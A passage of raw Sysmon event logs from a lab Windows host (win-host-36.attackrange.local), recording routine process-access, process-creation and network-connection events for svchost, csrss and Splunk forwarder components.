07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082817Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082816Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082815Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082814Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082813Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082812Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082811Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082810Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082809Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B427-615A-7B01-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082808Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.901{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B427-615A-7B01-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082807Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.902{2FDD8D40-B427-615A-7B01-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000082806Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B427-615A-7A01-00000000FD01}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082805Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082804Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082803Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082802Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082801Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082800Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082799Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082798Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082797Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082796Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B427-615A-7A01-00000000FD01}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082795Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.401{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B427-615A-7A01-00000000FD01}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082794Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.402{2FDD8D40-B427-615A-7A01-00000000FD01}372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000082793Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:29.331{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50122-false10.0.1.12-8089- 354300x800000000000000082792Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:28.705{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50121-false10.0.1.12-8000- 23542300x800000000000000082791Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:31.167{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 